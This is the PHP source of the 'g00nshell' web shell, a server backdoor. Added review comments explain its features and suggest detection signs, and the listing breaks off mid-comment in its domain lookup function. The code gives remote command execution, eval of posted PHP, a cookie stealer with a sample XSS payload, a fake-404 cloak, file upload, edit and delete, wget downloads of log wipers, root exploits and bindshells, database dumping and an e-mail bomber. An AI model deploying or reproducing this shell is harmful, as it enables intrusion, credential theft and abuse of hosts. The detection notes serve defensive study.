
<?

php
/*
######################################################################
# [g00n]fish presents: #
# g00nshell v1.4 beta #
############################documentation#############################
#to execute commands, simply include ?cmd=___ in the url. #
#ex: http://site.com/shl.php?cmd=whoami #
# #
#to steal cookies, use ?cookie=___ in the url. #
#ex: <script>document.location.href= #
#'http://site.com/shl.php?cookie='+document.cookies</script> #
# #
#in the ajax command shell, type 'home' to return to the shell's #
#directory. type 'clear' to clear the output screen. #
##########################verification levels#########################
#0: no protection; anyone can access #
#1: user-agent required #
#2: require ip #
#3: basic authentication #
##############################known bugs##############################
#the sql tool is not complete. there is currently no editing function#
#available. some time in the future this may be fixed, but for now #
#don't complain to me about it #
################################shouts################################
#pr0be - beta testing & css #
#trintitty - beta testing #
#clorox - beta testing #
#everyone else at g00ns.net #
########################note to administrators########################
#if this script has been found on your server without your approval, #
#it would probably be wise to delete it and check your logs. #
######################################################################
*/

// configuration
// NOTE(review): this file is a PHP web shell (a remote-administration backdoor). This block holds the
// operator-set access controls; none of them is consulted unless $auth selects it in the switch below.
$auth = 0;
$uakey = "b5c3d0b28619de70bf5588505f4061f2"; // md5 encoded user-agent
$ip = array("127.0.0.2","127.0.0.1"); // ip addresses allowed to access shell
$email = ""; // e-mail address where cookies will be sent
$user = "af1035a85447f5aa9d21570d884b723a"; // md5 encoded user
$pass = "47e331d2b8d07465515c50cb0fad1e5a"; // md5 encoded password

// global variables
// NOTE(review): superglobal and constant names throughout this listing are lower-case ($_server, $_get,
// $_post, $_session, $_files, directory_separator); PHP's are case-sensitive, so this copy is not the
// byte-exact file an attacker would deploy and hashes computed from this text will not match a live sample.
$version = '1.4 beta';
$self = $_server['php_self'];
$soft = $_server['server_software'];
// split() and the mysql_*() functions used further down were both removed in PHP 7.0: the sample targets
// PHP 4/5-era hosts.
$servinf = split('[:]', $_server['http_host']);
$servip = $servinf[0];
$servport = @$servinf[1] ? $servinf[1] : '80';
$cmd = @$_get['cmd'];
$act = @$_get['act'];
$cmd = @$_get['cmd']; // duplicate of the assignment two lines up
$curdir = cleandir(getcwd());
if(@$_get['dir']){
$dir = $_get['dir'];
if($dir != 'nullz') $dir = cleandir($dir); // 'nullz' is a sentinel for "no directory", consumed by view()
}
$contents = @$_post['contents'];
$gf = @$_post['gf'];
$img = @$_get['img'];
// credits to disruptiv for this bit ;)
// $me is the link base used by every menu and form below: the request URI up to its first '&' when this
// file is included by another one, otherwise $php_self plus '?' ($php_self is not assigned anywhere in
// this listing).
if(count(get_included_files()) > 1 || count(get_included_files()) > 1) list($me) =
explode("&", $_server['request_uri']);
else $me = $php_self . "?";
@session_start(); // the ajax shell keeps its working directory, and the sql tool its credentials, in the session
@set_time_limit(5);
// Access gate. A failed check ends in hide(), which fakes a 404 page and exits.
// Detection: a PHP file that exists on disk yet answers GET with 404 is worth a look; reconcile 404s in
// the access log against the document root.
switch($auth){ // authentication switcher
case 1: if(md5($_server['http_user_agent']) != $uakey) hide(); break; // md5(User-Agent) must equal $uakey
case 2: if(!in_array($_server['remote_addr'],$ip)) hide(); break; // source address must be listed in $ip
case 3: if(!$_server['php_auth_user']) userauth(); break; // basic-auth challenge, see userauth()
default: break; // 0: no gate at all
}

function cleandir($d){ // function to clean up the $dir and $curdir variables


// Canonicalises $d with realpath(), then replaces each pair of backslashes with one and each run of four
// slashes with two. realpath() returns false for a path that does not exist; str_replace() then coerces
// that to "" and the function returns an empty string.
$d = realpath($d);
$d = str_replace("\\\\", "\\", $d);
$d = str_replace("////", "//", $d);
return($d);
}

function userauth(){ // basic authentication function


global $user, $pass;
// Sends a WWW-Authenticate challenge (without a 401 status line) and compares md5 of the supplied user
// name against $user. The second operand is mis-parenthesised: md5() wraps the whole comparison
// ($_server['php_auth_pw'] != $pass) instead of the password, so a boolean is hashed and compared with
// $pass. Any mismatch ends in hide().
header("www-authenticate: basic realm='secure area'");
if(md5($_server['php_auth_user']) != $user || md5($_server['php_auth_pw'] !=
$pass)) hide();
}

function get_exec_function(){ // command execution method finder


// Returns the first candidate name that is not a substring of ini_get('disable_functions'); falls off the
// end (null) when all five are listed, which makes the callers die with "all execution methods disabled.".
// Mitigation: listing all five names in disable_functions defeats this probe. Note that main(), grab(),
// lookup() and bshell() call exec() directly without going through it.
$exec_functions = array("popen", "exec", "shell_exec", "system", "passthru");
$disabled_funcs = ini_get('disable_functions');
foreach($exec_functions as $f) if(strpos($disabled_funcs, $f) === false)
return $f;
}

function execute_command($exec_function, $command){ // command execution function


// Runs $command through the method chosen by get_exec_function() and writes the output straight into the
// response. $command arrives unmodified from the cmd / ajxcmd query parameters (see the dispatcher), so
// the executed command line is recorded in the web server access log. Detection: child processes whose
// parent is the PHP worker, and access-log entries carrying cmd= or ajxcmd=.
switch($exec_function){
case "popen": $h = popen($command, "r"); while(!feof($h)) echo(fgets($h)); // the pipe is never pclose()d
break;
case "exec": exec($command, $result); foreach($result as $r) echo($r .
"\n"); break;
case "shell_exec": echo(shell_exec($command)); break;
case "system": system($command); break;
case "passthru": passthru($command); break;
}
}

// Request dispatcher. Every feature is selected by request parameters, which is what makes the shell
// visible in access logs: GET cmd, ajxcmd, act, dir, f, cookie, img and POST gf, contents, phpexec all
// target this one file. With no parameter at all, main() renders the menu.
if(!$act && !$cmd && !@$_get['cookie'] && !@$_get['f'] && !@$dir && !$gf && !$img
&& !@$_get['ajxcmd']) main();

// ?cmd=<string> with no act: run it and print the output inside a <textarea>.
elseif(!$act && $cmd){ // raw command execution


style();
echo("<b>results:</b>\n<br><textarea rows=20 cols=100>");
if($exec_function = get_exec_function()) execute_command($exec_function,
$cmd);
else die("all execution methods disabled.</textarea>");
echo("</textarea>");
}
// ?ajxcmd=<string>: back end of the ajax shell rendered by cmd(). 'home' resets the session working
// directory; 'cd ...' takes the last space-separated token and either appends it to the session directory
// (when that is a directory and the token does not start with a separator) or uses it as-is (when it is a
// directory and does not start with '.'); anything else is executed after chdir() to the session directory.
elseif(@$_get['ajxcmd']){ // command execution for ajax shell
if($_get['ajxcmd'] == "home") $_session['work_dir'] = getcwd();
elseif($exec_function = get_exec_function()){
if(strpos($_get['ajxcmd'], 'cd') === 0){
$c = array_pop(explode(" ", $_get['ajxcmd']));
if(@is_dir($_session['work_dir'] . directory_separator . $c) &&
$c[0] != '\\' && $c[0] != '//') $_session['work_dir'] .= directory_separator . $c;
elseif(@is_dir($c) && $c[0] != '.') $_session['work_dir'] = $c;
else echo("invalid directory\n");
}
else{
@chdir($_session['work_dir']);
execute_command($exec_function, $_get['ajxcmd']);
}
}
else die("all execution methods disabled.");
}
// ?cookie=<string>: mails the value to $email with the subject "cookie data", then serves the fake 404.
// Detection: outbound mail from the web server user carrying that subject.
elseif(@$_get['cookie']){@mail($email, "cookie data", @$_get['cookie'], "from:
$email"); hide();} // cookie stealer function
elseif($act == 'view' && @$_get['f'] && $dir) view($_get['f'], $dir); // read / write / delete / download one file
elseif($img) img($img); // icon for the file listing
elseif($gf) grab($gf); // wget a remote file (tools() form)
elseif(@$dir) files($dir); // directory listing
else{
// act= selects the remaining features; 'sql' appears twice and the second case is unreachable.
switch($act){
case 'phpinfo': phpinfo();break;
case 'sql': sql();break;
case 'files': files(@$dir);break;
case 'email': email();break;
case 'cmd': cmd();break;
case 'upload': upload();break;
case 'tools': tools();break;
case 'sqllogin': sqllogin();break;
case 'sql': sql();break;
case 'lookup': lookup();break;
case 'kill': kill();break;
case 'phpexec': execphp();break;
case 'bshell': bshell();break;
default: main();break;
}
}

function hide(){ // hiding function


global $self, $soft, $servip, $servport;
// Answers with a 404 status line and an Apache-style "Not Found" body, then exits. Fingerprint: the
// footer concatenates $soft and "server at" with no separating space (e.g. "<software>server at <host>
// port <port>"), unlike a genuine Apache error document.
header("http/1.0 404 not found");
?>
<!doctype html public '-//ietf//dtd html 2.0//en'>
<html><head>
<title>404 not found</title>
</head><body>
<h1>not found</h1>
the requested url <?php echo($self); ?> was not found on this server.<p>
<p>additionally, a 404 not found
error was encountered while trying to use an errordocument to handle the request.
<hr>
<address><?php echo($soft . "server at " . $servip . " port " . $servport); ?
></address>
</body></html>
<?php
die();
}

function style(){ // style / header function


global $servip,$version;
// Emits <html><head> with the title "g00nshell v.<version>-<host>" and the inline CSS; most handlers call
// this first. Detection: the literal "g00nshell" in response bodies (main() prints it again in its footer).
?>
<html>
<head>
<title>g00nshell v.<?php echo($version . "-" . $servip); ?></title>
<style>
body { background-color:#000000; color:white; font-family:verdana; font-size:11px;
}
h1,h3 { color:white; font-family:verdana; font-size:11px; }
input,textarea,select,button { color:#ffffff; background-color:#000000; border:1px
solid #4f4f4f; font-family:verdana; font-size:11px; }
textarea { font-family:courier; }
a { color:#6f6f6f; text-decoration:none; font-family:verdana; font-size:11px; }
a:hover { color:#7f7f7f; }
td { font-size:12px; vertical-align:middle; }
th { font-size:13px; vertical-align:middle; }
table { empty-cells:show; }
.inf { color:#7f7f7f; }
</style>
</head>
<?php
}

function main(){ // main/menu function


global $me, $self, $servip, $servport, $soft, $version;
style();
// Menu page: host facts plus one link per act= feature, each loaded into the iframe named 'frm', which
// starts on the file listing. Every load performs reconnaissance: php_uname(), exec('whoami'),
// exec('id') and reads of safe_mode, open_basedir and disable_functions. Detection: whoami and id
// spawned by the web server process; the footer string ":: g00nshell" in the response body.
$act = array('cmd'=>'command execute','files'=>'file view','phpinfo'=>'php
info', 'phpexec'=>'php execute',
'tools'=>'tools','sqllogin'=>'sql','upload'=>'get files','kill'=>'kill
shell');
$capt = array_flip($act);
echo("<form method='get' name='shell'>\n");
echo("<b>host: <span class='inf'>$servip</span></b><br>\n");
echo("<b>server software: <span class='inf'>$soft</span></b><br>\n");
echo("<b>uname: <span class='inf'>" . php_uname() . "</span></b><br>\n");
echo("<b>shell directory: <span class='inf'>" . getcwd() .
"</span></b><br>\n");
echo("<div style='display:none' id='info'>\n");
echo("<b>current user: <span class='inf'>" . @exec('whoami').
"</span></b><br>\n");
echo("<b>id: <span class='inf'>" . @exec('id') . "</span></b><br>\n");
echo("<b>safemode: " . (@ini_get('safe_mode') ? "<font color='red'>on</font>"
: "<font color='green'>off</font><br>\n") . "</b>");
echo("<b>open base dir: " . (@ini_get('open_basedir') != '' ? "[ <span
class='inf'>" . ini_get('open_basedir') . "</span> ]" : "<font
color='green'>off</font>") . "</b><br>\n");
echo("<b>disabled functions: <span class='inf'>" .
(@ini_get('disable_functions') != '' ? @ini_get('disable_functions') : "none") .
"</span></b><br>\n");
// mysql_connect is passed as a bare (unquoted) constant here
echo("<b>mysql: " . (@function_exists(mysql_connect) ? "<font
color='green'>on</font>" : "<font color='red'>off</font>") . "</b>");
?>
</div>
<a href="#" onclick="document.getelementbyid('info').style.display =
'block';">more</a>
<a href="#" onclick="document.getelementbyid('info').style.display =
'none';">less</a>
<center>
<h3 align='center'>links</h3>
<?php
foreach($act as $link) echo("[ <a href='" . $me . "&act=" . $capt[$link] . "'
target='frm'>" . $link . "</a> ] "); ?>
</center>
<hr>
<br><iframe name='frm' style='width:100%; height:65%; border:0;' src='<?php
echo($me . "&act=files"); ?>'></iframe>
<pre style='text-align:center'>:: g00nshell <font color='red'>v<?php
echo($version); ?></font> ::</pre>
<?php
die();
}

function cmd(){ // command execution function


global $me;
style();
// Front end of the ajax shell: a text input that, on Enter, issues GET <me>&ajxcmd=<text> via
// XMLHttpRequest and appends the response to the <textarea id='history'>. 'clear' empties the history
// client-side; 'home' is handled server-side in the ajxcmd branch of the dispatcher. The JavaScript below
// appears case-folded in this listing just like the PHP (e.g. getelementbyid, xmlhttprequest).
?>
<script>
var http = null;
function char(e){
if(window.event) k = e.keycode;
else if(e.which) k = e.which;
if(k == 13){
cmd = document.getelementbyid('c').value;
if(cmd == "clear") document.getelementbyid('history').value = "";
else if(document.getelementbyid('c').value != "") exec(cmd);
document.getelementbyid('c').value = "";
}
}
function exec(cmd){
if (window.xmlhttprequest) http = new xmlhttprequest();
else if (window.activexobject) http = new activexobject("microsoft.xmlhttp");
if(http){
http.onreadystatechange = handle_response;
http.open("get", "<?php echo($me . "&ajxcmd="); ?>" + cmd, true);
http.send(null);
}
else alert("your browser fails.");
}
function handle_response(){
if(http.readystate == 4) document.getelementbyid('history').value += "# " +
cmd + "\n" + http.responsetext;
document.getelementbyid('history').scrolltop =
document.getelementbyid('history').scrollheight;
}
</script>
</head>
<body onload="document.getelementbyid('c').focus();
document.getelementbyid('history').scrolltop =
document.getelementbyid('history').scrollheight;">
<input type="text" id="c" onkeydown="char(event);" style="width:100%; border:1px
solid #1f1f1f;"><br><textarea id="history" style="width:100%; height:90%;
border:0px; overflow: auto;"></textarea>
</body></html>
<?php
}

function execphp(){ // php code execution function


// Arbitrary PHP execution: the POST field phpexec is eval()'d after stripslashes(), with output captured
// in a <textarea>; the submitted code is also echoed back into the form through htmlentities().
// Detection: POST bodies carrying a phpexec field. eval() is a language construct, not a function, so
// disable_functions does not cover it; removing the file is the remedy.
style();
echo("<h4>execute php code</h4>");
echo("<form method='post'>");
echo("<textarea name='phpexec' rows=5 cols=100>");
if(!@$_post['phpexec']) echo("/*don't include <? ?> tags*/\n");
echo(stripslashes(htmlentities(@$_post['phpexec'])) . "</textarea>\n<br>\n");
echo("<input type='submit' value='execute'>");
echo("</form>");
if(@$_post['phpexec']){
echo("<textarea rows=10 cols=100>");
eval(stripslashes($_post['phpexec']));
echo("</textarea>");
}
}

function sqllogin(){ // mysql login function


global $me;
// Login form for the sql tool. Neither header("location: ...") is followed by an exit, so the form is
// still rendered (and die() reached) after the redirect header is set. The password field is a plain
// text input; the submitted values are stored in the session by sql().
if(@$_session['isloggedin'] == "true")
header("location: " . $me . "&act=sql");
if(@$_post['un'] && @$_post['pw'])
header("location: " . $me . "&act=sql");
style();
?>
<form method='post'>
user:<br><input type='text' name='un' size='30'><br>
password:<br><input type='text' name='pw' size='30'><br>
host:<br><input type='text' name='host' size='30' value='localhost'><br>
port:<br><input type='text' name='port' size='30' value='3306'><br>
<input type='submit' value='login'>
</form>
<?php
die();
}

function sql(){ // general sql function


global $me;
// Database browser. Credentials from the login form are kept in the session (sql_user, sql_password,
// sql_host, sql_port) and reused on every request. Navigation is entirely by GET parameters: db, table,
// p (page of 30 rows), sqlf (dl = sqldownload(), ins = sqlinsert()) and sqlquery, which is handed to
// mysql_query() verbatim. Every statement is built by string concatenation. Uses the mysql_* extension,
// removed in PHP 7.0. Detection: database logins from the web server host using credentials the
// application itself does not own; sqlquery= in the access log.
if(!@$_get['sqlf']){style();}
if(@$_post['un'] && $_post['pw']){;
$_session['sql_user'] = $_post['un'];
$_session['sql_password'] = $_post['pw'];
}
$_session['sql_host'] = @$_post['host'] ? $_post['host'] : 'localhost';
$_session['sql_port'] = @$_post['port'] ? $_post['port'] : '3306';

if(@$_session['sql_user'] && @$_session['sql_password']){


// a failed connect clears the stored credentials and falls back to the login form (which exits)
if(!($sqlcon = @mysql_connect($_session['sql_host'] . ':' .
$_session['sql_port'], $_session['sql_user'], $_session['sql_password']))){
unset($_session['sql_user'], $_session['sql_password'],
$_session['sql_host'], $_session['sql_port']);
echo("invalid credentials<br>\n");
die(sqllogin());
}
else
$_session['isloggedin'] = "true";
}
else
die(sqllogin());

if (@$_get['db']){
mysql_select_db($_get['db'], $sqlcon);
// ?sqlquery=: free-form statement; only the first column of each row is printed
if(@$_get['sqlquery']){
$dat = mysql_query($_get['sqlquery'], $sqlcon) or die(mysql_error());
$num = mysql_num_rows($dat);
for($i=0;$i<$num;$i++)
echo(mysql_result($dat, $i) . "<br>\n");
}
// ?table= without sqlf: paginated dump of the table, fetched one cell at a time with
// "select <col> from <table> where <firstcol> = '<x>'", i.e. it presumes the first column holds the
// 1-based row number
else if(@$_get['table'] && !@$_get['sqlf']){
echo("<a href='" . $me . "&act=sql&db=" . $_get['db'] . "&table=" .
$_get['table'] . "&sqlf=ins" . "'>insert row</a><br><br>\n");
echo("<table border='1'>");
$query = "show columns from " . $_get['table'];
$result = mysql_query($query, $sqlcon) or die(mysql_error());
$i = 0;
$fields = array();
while($row = mysql_fetch_assoc($result)){
array_push($fields, $row['field']);
echo("<th>" . $fields[$i]);
$i++;
}
$result = mysql_query("select * from " . $_get['table'], $sqlcon) or
die(mysql_error());
$num_rows = mysql_num_rows($result) or die(mysql_error());
$y=0;
for($x=1;$x<=$num_rows+1;$x++){
if(!@$_get['p'])
$_get['p'] = 1;
if(@$_get['p']){
if($y > (30*($_get['p']-1)) && $y <= 30*($_get['p'])){
echo("<tr>");
for($i=0;$i<count($fields);$i++){
$query = "select " . $fields[$i] . " from " .
$_get['table'] . " where " . $fields[0] . " = '" . $x . "'";
$dat = mysql_query($query, $sqlcon) or
die(mysql_error());
while($row = mysql_fetch_row($dat))
echo("<td>" . $row[0] . "</td>");
}
echo("</tr>\n");
}
}
$y++;
}
echo("</table>\n");
// page links; note there is no '&' before act= here, unlike the other links in this function
for($z=1;$z<=ceil($num_rows / 30);$z++){
echo("<a href='" . $me . "act=sql&db=" . $_get['db'] . "&table=" .
$_get['table'] . "&p=" . $z . "'>" . $z . "</a> | ");
}
}
elseif(@$_get['table'] && @$_get['sqlf']){
switch($_get['sqlf']){
case "dl": sqldownload();break;
case "ins": sqlinsert();break;
default: $_get['sqlf'] = "";
}
}
// ?db= alone: list the tables, each with a download link
else{
echo("<table>");
$query = "show tables from " . $_get['db'];
$dat = mysql_query($query, $sqlcon) or die(mysql_error());
while ($row = mysql_fetch_row($dat))
echo("<tr><td><a href='" . $me . "&act=sql&db=" . $_get['db'] .
"&table=" . $row[0] . "'>" . $row[0] . "</a></td><td>[<a href='" . $me .
"&act=sql&db=" . $_get['db'] . "&table=" . $row[0] ."&sqlf=dl" .
"'>download</a>]</td></tr>\n");
echo("</table>");
}
}
// no db selected: list the databases
else{
$dbs=mysql_list_dbs($sqlcon);
while($row = mysql_fetch_object($dbs))
echo("<a href='" . $me . "&act=sql&db=" . $row->database . "'>" .
$row->database . "</a><br>\n");
}
mysql_close($sqlcon);
}

function sqldownload(){ // download sql file function


// Exports the rows of GET table as "('v1', 'v2', ...);" lines and sends them as <table>-<time>.sql with
// Content-Disposition: attachment. Cells are fetched one at a time with
// "select <col> from <table> where <firstcol> = '<x>'" for $x from 1 while $x < $num_rows, so it
// presumes the first column holds 1-based row numbers. $out and $i are used before being initialised.
// Detection: this is bulk data exfiltration; look for .sql attachment responses served by this file.
$sqlcon = @mysql_connect($_session['sql_host'] . ':' . $_session['sql_port'],
$_session['sql_user'], $_session['sql_password']);
mysql_select_db($_get['db'], $sqlcon);
$query = "show columns from " . $_get['table'];
$result = mysql_query($query, $sqlcon) or die(mysql_error());
$fields = array();
while($row = mysql_fetch_assoc($result)){
array_push($fields, $row['field']);
$i++;
}
$result = mysql_query("select * from " . $_get['table'], $sqlcon) or
die(mysql_error());
$num_rows = mysql_num_rows($result) or die(mysql_error());
for($x=1;$x<$num_rows;$x++){
$out .= "(";
for($i=0;$i<count($fields);$i++){
$out .= "'";
$query = "select " . $fields[$i] . " from " . $_get['table'] . " where
" . $fields[0] . " = '" . $x . "'";
$dat = mysql_query($query, $sqlcon) or die(mysql_error());
while($row = mysql_fetch_row($dat)){
if($row[0] == "")
$row[0] = "null";
if($i != count($fields)-1)
$out .= str_replace("\r\n", "\\r\\n", $row[0]) . "', ";
else
$out .= $row[0]. "'";
}
}
$out .= ");\n";
}
$filename = @$_get['table'] . '-' . time() . '.sql';
header("content-type: application/octet-stream");
header("content-length: " . strlen($out));
header("content-disposition: attachment; filename=$filename;");
echo($out);
die();
}

function sqlinsert(){
// Renders an insert form for the columns of GET table and, on a POST that carries ins, builds
// "insert into <table> (<post keys>) values ('<post values>')" from the remaining POST fields. Debug
// output is left in: print_r($_post) and echo($query). $me is used in the "go back" link without a
// global declaration, so that href is empty.
style();
$sqlcon = @mysql_connect($_session['sql_host'] . ':' . $_session['sql_port'],
$_session['sql_user'], $_session['sql_password']);
mysql_select_db($_get['db'], $sqlcon);
if(@$_post['ins']){
unset($_post['ins']);
$fields = array_flip($_post);
print_r($_post);
$f = implode(",", $fields);
$v = implode("','", $_post);
$query = "insert into " . $_get['table'] . " (" . $f . ") values ('" . $v
. "')";
echo($query);
mysql_query($query, $sqlcon) or die("mysql error: " . mysql_error());
die("row inserted.<br>\n<a href='" . $me . "&act=sql&db=" . $_get['db'] .
"&table=" . $_get['table'] . "'>go back</a>");
}
$query = "show columns from " . @$_get['table'];
$result = mysql_query($query, $sqlcon) or die("mysql error: " .
mysql_error());
$i = 0;
$fields = array();
echo("<form method='post'>");
echo("<table>");
while($row = mysql_fetch_assoc($result)){
array_push($fields, $row['field']);
echo("<tr><td><b>" . $fields[$i] . "</b><td><input type='text' name='" .
$fields[$i] . "'><br>\n");
$i++;
}
echo("</table>");
echo("<br>\n<input type='submit' value='insert' name='ins'>");
echo("</form>");
}

function nicesize($size){ // human-readable byte count: "N b" / "N kb" / "N mb" / "N gb", rounded to whole units
    // any falsy input (0, null, "", false) renders as "0 b"
    if(!$size) return "0 b";
    // largest matching unit wins, so check from gb down to kb
    $units = array(1073741824 => " gb", 1048576 => " mb", 1024 => " kb");
    foreach($units as $divisor => $suffix){
        if($size >= $divisor) return(round($size / $divisor) . $suffix);
    }
    return($size . " b");
}

function files($dir){ // file manipulator function


global $me, $self, $curdir;
style();
// Directory listing for ?dir=<path> (defaults to the shell's own directory). Each entry is coloured by
// access: forestgreen writable, gold readable, red neither. Directories link back here, files link to
// view(), icons come from img(). Detection: requests with dir= and act=view&f= parameters.
if($dir=="") $dir = $curdir;
$dirx = explode(directory_separator, $dir);
$files = array();
$folders = array();
echo("<form method='get'>");
echo("<input type='text' name='dir' value='$dir' size='40'>");
echo("<input type='submit' value='go'>");
echo("</form>");
echo("<h4>file list for ");
// breadcrumb: one link per path component
for($i=0;$i<count($dirx);$i++){
@$totalpath .= $dirx[$i] . directory_separator;
echo("<a href='" . $me . "&dir=$totalpath" . "'>$dirx[$i]</a>" .
directory_separator);
}
echo("</h4>");
echo("<table>");
echo("<th>file name<th>file size</th>");
if ($handle = opendir($dir)) {
while (false != ($link = readdir($handle))) {
if (@is_dir($dir . directory_separator . $link)){
$file = array();
$color = @is_writable($dir . directory_separator . $link) ?
"forestgreen" : (is_readable($dir . directory_separator . $link) ? "gold" :
"red");
@$file['link'] = "<a href='$me&dir=$dir" . directory_separator .
"$link'><font color='$color'>$link</font></a>";
@$file['icon'] = "folder";
$folder = "<img src='" . $me . "&img=" . $file['icon'] .
"'>&nbsp;". $file['link'];
array_push($folders, $folder);
}
else{
$file = array();
$ext = strpos($link, ".") ? strtolower(end(explode(".", $link))) :
"";
$file['size'] = nicesize(@filesize($dir . directory_separator .
$link));
$color = @is_writable($dir . directory_separator . $link) ?
"forestgreen" : (is_readable($dir . directory_separator . $link) ? "gold" :
"red");
@$file['link'] = "<a href='$me&act=view&f=$link&dir=$dir'><font
color='$color'>$link</font></a>";
// icon by extension; 'h' is listed twice in the script group
switch($ext){
case 'exe': case 'com': case 'jar': case '':
$file['icon']='binary'; break;
case 'jpg': case 'gif': case 'png': case 'bmp':
$file['icon']='image'; break;
case 'zip': case 'tar': case 'rar': case 'gz': case 'cab':
case 'bz2': case 'gzip': $file['icon']='compressed'; break;
case 'txt': case 'doc': case 'pdf': case 'htm': case 'html':
case 'rtf': $file['icon']='text'; break;
case 'wav': case 'mp3': case 'mp4': case 'wma':
$file['icon']='sound'; break;
case 'js': case 'vbs': case 'c': case 'h': case 'sh': case
'pl': case 'py': case 'php': case 'h': $file['icon']='script'; break;
default: $file['icon'] = 'unknown'; break;
}
$file = "<tr><td><img src='" . $me . "&img=" . $file['icon'] . "'
height='18' width='18'>&nbsp;". $file['link'] . "<td>" . $file['size'] .
"</td></tr>\n";
array_push($files, $file);
}
}
foreach($folders as $folder)
echo("<tr><td>$folder</td><td>dir</td></tr>\n");
foreach($files as $file) echo($file);
echo("</table>");
closedir($handle);
}
}

function email(){ // email bomber function


global $me;
style();
// Sends the same message POST 'times' times through the local mail() function, with a From: header taken
// verbatim from POST 'from'. Detection: bursts of identical mail originating from the web server user;
// the MTA log will show the PHP process as the submitter.
?>
<form method='post' action='<?php echo("$me&act=email"); ?>'>
<b>your address:</b><br>
<input name='from' type='text' size='35'><br>
<b>their address:</b><br>
<input name='to' type='text' size='35'><br>
<b>subject:</b><br>
<input name='subject' type='text' size='35'><br>
<b>text:</b><br>
<input name='body' type='text' size='35'><br>
<b>how many times:</b><br>
<input name='times' type='text' size='5'><br><br>
<input name='submit' type='submit' value='submit'>
</form>
<?php
if (@$_post['to'] && @$_post['from']){
$headers = "from: " . $_post['from'];
for($i=0; $i<@$_post['times']; $i++){
@mail(@$_post['to'], @$_post['subject'], @$_post['body'], $headers) or
die("mail could not be sent");
}
echo("mail sent");
}
}

function view($filename, $dir){ // file view function


global $me;
// Single-file editor. Depending on which fileact submit button was pressed: download streams the file as
// an attachment (Content-Length is taken from the length of POST contents, not the file, and this branch
// runs before $dir is prepended, so $filename is opened relative to the current directory); save
// overwrites the file with POST contents; delete unlink()s it. Otherwise the file is shown in a
// <textarea>. $dir == "nullz" means $filename is already a full path (the "go back" link after saving).
if(@$_post['fileact'] == "download"){
header("content-type: application/octet-stream");
header("content-length: " . strlen($_post['contents']));
header("content-disposition: attachment; filename=" . basename($filename)
. ";");
$handle = @fopen($filename, "r");
echo(@fread($handle, filesize($filename)));
die();
}
style();
if(@$_post['contents'] && @$_post['fileact'] == "save"){
$handle = @fopen($filename, 'w');
fwrite($handle, stripslashes($_post['contents']));
fclose($handle);
echo("saved file.<br><br>");
echo("<a href='$me&act=view&f=$filename&dir=nullz'>go back</a>");
die();
}
elseif(@$_post['fileact'] == "delete"){
unlink($filename);
echo("deleted file.<br><br>");
echo("<a href='$me&act=files'>go back</a>");
die();
}

if($dir != "nullz") $filename = $dir . directory_separator . $filename; // heh


$file = @fopen($filename, 'r');
$content = @fread($file, @filesize($filename));
echo("<form name='file' method='post'
action='$me&act=view&dir=$dir&f=$filename'>");
echo("<textarea style='width:100%; height:92%;' name='contents'>");
echo(htmlentities($content) . "\n");
?>
</textarea>
<input name='fileact' type='submit' value='save'>
<input name='fileact' type='submit' value='delete'>
<input name='fileact' type='submit' value='download'>
</form>
<?php
}

function upload(){ // uploading frontend function


global $curdir;
style();
// Upload form with two paths: POST rem (a URL) goes to grab(), which shells out to wget; the multipart
// file field 'up' goes to up(), which calls move_uploaded_file(). Both write into the directory given in
// POST loc. Detection: multipart POSTs to this file, and wget spawned by the web server.
?>
<form name='files' enctype='multipart/form-data' method='post'>
<b>output directory</b><br>
<input type='text' name='loc' size='65' value='<?php echo($curdir); ?>'><br><br>
<b>remote upload</b><br>
<input type='text' name='rem' size='65'>
<input type='submit' value='grab'><br><br>
<b>local file upload</b><br>
<input name='up' type='file' size='65'>
<input type='submit' value='upload'>
</form><br>
<?php
if(@$_post['rem']) grab($_post['rem']);
if(@$_files['up']) up($_files['up']);
}

function up($up){ // uploading backend funciton


style();
$updir = @$_post['loc'];
// moves the temp file to <loc>/<client-supplied file name>, name used as-is
move_uploaded_file($up['tmp_name'], $updir . directory_separator .
$up['name']);
die("file has been uploaded.");
}

function grab($file){ // uploading backend function


style();
$updir = @$_post['loc'];
// Fetches $file with a backgrounded wget (-b) into <loc>/<last path component>; $file is interpolated
// into the command line unquoted. Detection: wget processes whose parent is the web server, and new
// files appearing in web-writable directories.
$filex = array_pop(explode(directory_separator, $file));
if(exec("wget $file -b -o $updir" . directory_separator . $filex)) die("file
has been uploaded.");
else die("file upload failed.");
}

function tools(){ // useful tools function


global $me, $curdir;
style();
// Menu of hard-coded third-party download URLs (grouped as <optgroup>s by the numeric placeholder
// entries); the selected URL is POSTed as gf and handed to grab(). Detection: outbound HTTP from the
// web server to the hosts listed below, and the resulting files on disk in the chosen directory.
$tools = array(
"--- log wipers ---"=>"1",
"vanish2.tgz"=>"http://packetstormsecurity.org/unix/penetration/log-
wipers/vanish2.tgz",
"cloak.c"=>"http://packetstormsecurity.org/unix/penetration/log-
wipers/cloak.c",
"gh0st.sh"=>"http://packetstormsecurity.org/unix/penetration/log-
wipers/gh0st.sh",
"--- priv escalation ---"=>"2",
"h00lyshit - linux 2.6 all"=>"http://someshit.net/files/xpl/h00lyshit",
"k-rad3 - linux <= 2.6.11"=>"http://someshit.net/files/xpl/krad3",
"raptor - linux <= 2.6.17.4"=>"http://someshit.net/files/xpl/raptor",
"rootbsd - bsd v?"=>"http://someshit.net/files/xpl/rootbsd",
"--- bindshells ---"=>"3",
"thc rwwwshell-
1.6.perl"=>"http://packetstormsecurity.org/groups/thc/rwwwshell-1.6.perl",
"basic perl
bindshell"=>"http://packetstormsecurity.org/groups/synnergy/bindshell-unix",
"--- misc ---"=>"4",
"mocks socks4 proxy"=>"http://superb-
east.dl.sourceforge.net/sourceforge/mocks/mocks-0.0.2.tar.gz",
"xps.c (proc
hider)"=>"http://packetstormsecurity.org/groups/shadowpenguin/unix-tools/xps.c");
$names = array_flip($tools);
echo("<form method='post'>");
echo("<b>output directory</b><br>");
echo("<input type='text' name='loc' size='65' value='$curdir'><br><br>");
echo("<select name='gf' style='align:center;'>");
foreach($tools as $tool)
echo(is_numeric($tool) ? "<optgroup label='$names[$tool]'>\n" : "<option
value='$tool'>$names[$tool]</option>\n");
echo("</select>");
echo("<br><input type='submit' value='grab'>");
echo("</form>");
echo("<br>");
echo("<a href=$me&act=bshell>bindshell</a> (requires writable
directory)<br>\n");
echo("<a href=$me&act=lookup>list domains</a> (requires writable
directory)<br>\n");
echo("<a href=$me&act=email>e-mail bomber</a><br>\n");
}

function lookup(){ // domain lookup function


global $servinf;
style();
// Writes a small Python script to lookup.py in the working directory, runs "python lookup.py <host>"
// to ask a third-party reverse-IP service for other domains hosted on this server, prints the result and
